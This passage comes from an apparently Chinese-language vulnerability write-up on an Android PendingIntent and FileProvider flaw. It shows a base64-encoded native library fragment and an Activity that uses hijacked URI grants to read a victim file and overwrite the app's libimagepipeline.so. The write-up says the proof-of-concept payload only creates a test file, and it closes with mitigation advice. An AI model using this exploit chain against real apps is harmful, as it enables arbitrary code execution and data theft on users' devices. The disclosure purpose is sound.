RlLmFuZHJvaWQuaWRlbnQALm5vdGUuZ251LmJ1aWxkLWlkAC5keW5zeW0ALmR5bnN0cgAuaGFzaAAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX2QALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALnRleHQALkFSTS5leGlkeAAuQVJNLmV4dGFiAC5yb2RhdGEALmZpbmlfYXJyYXkALmR5bmFtaWMALmdvdAAuZGF0YQAuYnNzAC5jb21tZW50AC5ub3RlLmdudS5nb2xkLXZlcnNpb24ALkFSTS5hdHRyaWJ1dGVzAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAAAABwAAAAIAAAA0AQAANAEAAJgAAAAAAAAAAAAAAAQAAAAAAAAAHwAAAAcAAAACAAAAzAEAAMwBAAAkAAAAAAAAAAAAAAAEAAAAAAAAADIAAAALAAAAAgAAAPABAADwAQAAgAEAAAQAAAABAAAABAAAABAAAAA6AAAAAwAAAAIAAABwAwAAcAMAAG0BAAAAAAAAAAAAAAEAAAAAAAAAQgAAAAUAAAACAAAA4AQAAOAEAACsAAAAAwAAAAAAAAAEAAAABAAAAEgAAAD///9vAgAAAIwFAACMBQAAMAAAAAMAAAAAAAAAAgAAAAIAAABVAAAA/f//bwIAAAC8BQAAvAUAABwAAAAEAAAAAQAAAAQAAAAAAAAAZAAAAP7//28CAAAA2AUAANgFAABAAAAABAAAAAIAAAAEAAAAAAAAAHMAAAAJAAAAAgAAABgGAAAYBgAA4AAAAAMAAAAAAAAABAAAAAgAAAB8AAAACQAAAEIAAAD4BgAA+AYAAFAAAAADAAAAEgAAAAQAAAAIAAAAgAAAAAEAAAAGAAAASAcAAEgHAACMAAAAAAAAAAAAAAAEAAAAAAAAAIUAAAABAAAABgAAANQHAADUBwAAeAUAAAAAAAAAAAAABAAAAAAAAACLAAAAAQAAcIIAAABMDQAATA0AAKgAAAAMAAAAAAAAAAQAAAAIAAAAlgAAAAEAAAACAAAA9A0AAPQNAAC0AAAAAAAAAAAAAAAEAAAAAAAAAKEAAAABAAAAMgAAAKgOAACoDgAACAMAAAAAAAAAAAAAAQAAAAEAAACpAAAADwAAAAMAAACwLgAAsB4AAAgAAAAAAAAAAAAAAAQAAAAEAAAAtQAAAAYAAAADAAAAuC4AALgeAAAQAQAABAAAAAAAAAAEAAAACAAAAL4AAAABAAAAAwAAAMgvAADIHwAAOAAAAAAAAAAAAAAABAAAAAAAAADDAAAAAQAAAAMAAAAAMAAAACAAAGQAAAAAAAAAAAAAAAQAAAAAAAAAyQAAAAgAAAADAAAAZDAAAGQgAAAMAAAAAAAAAAAAAAAEAAAAAAAAAM4AAAABAAAAMAAAAAAAAABkIAAApgEAAAAAAAAAAAAAAQAAAAEAAADXAAAABwAAAAAAAAAAAAAADCIAABwAAAAAAAAAAAAAAAQAAAAAAAAA7gAAAAMAAHAAAAAAAAAAACgiAAA2AAAAAAAAAAAAAAABAAAAAAAAAAEAAAADAAAAAAAAAAAAAABeIgAA/gAAAAAAAAAAAAAAAQAAAAAAAAA=";
@Override
protected void onCreate(@Nullable Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
Log.e(tag,"receive oncreate");
ClipData clipData = getIntent().getClipData();
if(clipData!=null){
try {
Log.e(tag,"receive clipdata");
Uri uri1 = clipData.getItemAt(0).getUri();
InputStream inputStream = getContentResolver().openInputStream(uri1);
Log.e("Hijack read", IOUtils.toString(inputStream));
Uri uri2 = clipData.getItemAt(1).getUri();
OutputStream outputStream = getContentResolver().openOutputStream(uri2);
IOUtils.write(Base64.decode(s,Base64.DEFAULT), outputStream);
outputStream.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}
}
收到以后,写入这个so即可.
这个libimagepipeline.so是我们修改后的,会在加载的时候在app根目录创建poc文件,并写入123.
如何防范此类攻击
- PendingIntent都应该携带FLAG_IMMUTABLE
- FileProvider不要暴露
root-path.
其他
完整的项目可以参见b站任意代码执行poc